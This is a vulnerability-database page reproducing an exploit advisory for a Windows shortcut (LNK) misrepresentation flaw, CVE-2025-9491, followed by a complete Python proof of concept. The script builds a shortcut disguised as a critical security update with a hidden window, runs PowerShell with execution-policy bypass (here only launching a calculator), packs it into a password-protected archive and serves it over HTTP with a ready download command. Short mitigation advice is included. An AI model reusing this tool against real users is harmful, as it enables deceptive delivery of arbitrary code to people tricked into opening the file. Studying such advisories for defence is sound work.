Vulners
Lucene search
📄 Microsoft Windows LNK File UI Misrepresentation Remote Code Execution
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | November “In the Trend of VM” (#21): vulnerabilities in Windows, SharePoint, Redis, XWiki, Zimbra Collaboration, and Linux | 14 Nov 202520:44 | – | avleonov |
| About Remote Code Execution – Windows LNK File (CVE-2025-9491) vulnerability | 5 Nov 202514:14 | – | avleonov |
 | CVE-2025-9491 | 3 Sep 202503:00 | – | circl |
 | Microsoft Windows 安全漏洞 | 26 Aug 202500:00 | – | cnnvd |
 | CVE-2025-9491 | 26 Aug 202516:25 | – | cve |
 | CVE-2025-9491 Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability | 26 Aug 202516:25 | – | cvelist |
 | Exploit for User Interface (UI) Misrepresentation of Critical Information in Microsoft | 7 Nov 202514:52 | – | githubexploit |
 | EUVD-2025-28860 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-9491 | 26 Aug 202517:15 | – | nvd |
 | CVE-2025-9491 | 26 Aug 202517:15 | – | osv |
10
# Title: Windows LNK File UI Misrepresentation Remote Code Execution
# Date: 2025-01-04
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (Windows OS component)
# Version: Windows 10, Windows 11, Windows Server 2016/2019/2022
# Tested on: Windows 10 22H2, Windows 11 23H2
# CVE: CVE-2025-9491
# CVSS: 8.8
###Description:
A critical vulnerability exists in Microsoft Windows LNK file handling that
allows
attackers to create malicious shortcut files that appear legitimate in
Windows
Explorer while executing arbitrary commands. The vulnerability is a UI
misrepresentation flaw where Windows incorrectly displays file properties.
### Exploit:
[href](
https://raw.githubusercontent.com/nu11secur1ty/Windows11Exploits/refs/heads/main/2025/CVE-2025-9491/Exploit/CVE-2025-9491.py
)
### Technical Details:
The vulnerability allows attackers to craft LNK files with:
1. Legitimate-looking icons (document, PDF, Windows Update shield)
2. Misleading descriptions ("Security Update", "Important Document")
3. Hidden command execution in arguments field
4. Window state set to hidden (SW_SHOWMINNOACTIVE = 7)
When a user opens the malicious LNK file, Windows Explorer shows it as a
harmless
document, but the file actually executes commands with the user's
privileges.
No security warnings are displayed to the user.
### Proof of Concept:
An LNK file can be created that:
- Shows as "Windows Security Update" with shield icon
- Actually executes: cmd.exe /c powershell -Command "malicious_payload"
- Runs with hidden window (WindowStyle = 7)
### The LNK file can be delivered via:
1. Email attachments
2. Network shares
3. Web downloads
4. USB devices
5. Compressed archives
### Impact:
- Remote Code Execution with user privileges
- No user warnings or security prompts
- Complete UI deception
- Easy to weaponize
### Mitigation:
1. Enable display of file extensions in Windows Explorer
2. Block .LNK file attachments at email gateways
3. Implement application control (AppLocker, WDAC)
4. Monitor for hidden process execution
5. User education about suspicious files
### Vendor Status:
Microsoft has been notified. No patch available as of 2025-01-04.
References:
- CVE-2025-9491
- Microsoft Security Response Center
Note: This information is for defensive purposes only.
Unauthorized testing against systems you don't own is illegal.
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--- proof of concept ---
#!/usr/bin/python
# nu11secur1ty 2025
import os
import sys
import subprocess
import socket
import threading
import pythoncom
from win32com.client import Dispatch
from http.server import HTTPServer, BaseHTTPRequestHandler
def get_script_directory():
if getattr(sys, 'frozen', False):
return os.path.dirname(sys.executable)
else:
return os.path.dirname(os.path.abspath(__file__))
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except:
ip = '0.0.0.0'
finally:
s.close()
return ip
def create_malicious_lnk():
script_dir = get_script_directory()
lnk_path = os.path.join(script_dir, 'Critical_Update.lnk')
print("[*] Creating malicious LNK file...")
try:
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(lnk_path)
shortcut.TargetPath = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"'
shortcut.WorkingDirectory = r'C:\Windows\System32'
shortcut.Description = 'Critical Windows Security Update - KB5029244'
icon_paths = [
r'C:\Windows\System32\shell32.dll',
r'C:\Windows\System32\imageres.dll',
]
for icon_path in icon_paths:
if os.path.exists(icon_path):
shortcut.IconLocation = f'{icon_path},78'
break
shortcut.WindowStyle = 7
shortcut.save()
if os.path.exists(lnk_path):
print(f"[+] LNK created: {lnk_path}")
return lnk_path
else:
return None
except Exception as e:
print(f"[-] Error: {e}")
return None
def compress_with_7zip(lnk_path, password=None):
if not lnk_path or not os.path.exists(lnk_path):
print("[-] LNK file not found")
return None
seven_zip_paths = [
r'C:\Program Files\7-Zip\7z.exe',
r'C:\Program Files (x86)\7-Zip\7z.exe',
'7z.exe',
'7z'
]
seven_zip = None
for path in seven_zip_paths:
try:
result = subprocess.run([path, '--help'], capture_output=True, text=True)
if result.returncode == 0:
seven_zip = path
break
except:
continue
if not seven_zip:
print("[-] 7-Zip not found")
return None
archive_name = os.path.join(get_script_directory(), 'update.7z')
cmd = [seven_zip, 'a', archive_name, lnk_path]
if password:
cmd.extend(['-p' + password])
cmd.extend(['-mx9', '-mhe=on', '-t7z'])
print("[*] Compressing with 7-Zip...")
try:
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode == 0:
print(f"[+] Archive created: {archive_name}")
if password:
print(f"[+] Password: {password}")
return archive_name
else:
return None
except Exception as e:
print(f"[-] Compression failed: {e}")
return None
class FileHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/update.7z':
file_path = 'update.7z'
if os.path.exists(file_path):
self.send_response(200)
self.send_header('Content-type', 'application/x-7z-compressed')
self.send_header('Content-Disposition', 'attachment; filename="update.7z"')
with open(file_path, 'rb') as f:
content = f.read()
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
print(f"[+] CVE-2025-9491: Malicious LNK served to {self.client_address[0]}")
else:
self.send_error(404)
else:
self.send_error(404)
def log_message(self, format, *args):
pass
def start_server(port=8080):
ip = get_local_ip()
print(f"[+] Starting server on http://{ip}:{port}")
print(f"[+] Download URL: http://{ip}:{port}/update.7z")
print("[+] Server running...")
server = HTTPServer((ip, port), FileHandler)
server.serve_forever()
def main():
print("=" * 60)
print("CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server")
print("=" * 60)
try:
from win32com.client import Dispatch
except ImportError:
print("[-] Install pywin32: pip install pywin32")
return
# Create LNK
lnk_file = create_malicious_lnk()
if not lnk_file:
print("[-] Failed to create LNK")
return
# Compress with 7-Zip
print("\n[*] Compress with 7-Zip? (y/n): ", end='')
compress = input().lower().strip()
if compress == 'y':
print("[*] Password (optional): ", end='')
password = input().strip()
if not password:
password = None
archive = compress_with_7zip(lnk_file, password)
if archive:
print(f"\n[+] Archive ready: {archive}")
# Start HTTP server in background thread
server_thread = threading.Thread(target=start_server, daemon=True)
server_thread.start()
ip = get_local_ip()
print(f"\n[+] Server started at http://{ip}:8080")
print(f"[+] Download: http://{ip}:8080/update.7z")
print("\n[+] PowerShell download command:")
print(f' iwr http://{ip}:8080/update.7z -OutFile update.7z')
# Keep main thread alive
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\n[*] Shutting down...")
else:
print("[-] Compression failed")
print(f"[*] Use raw LNK: {lnk_file}")
else:
print(f"\n[*] Raw LNK file: {lnk_file}")
if __name__ == "__main__":
import time
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.13.3 - 7.8
CVSS 44.6
CVSS 37
EPSS0.00912
SSVC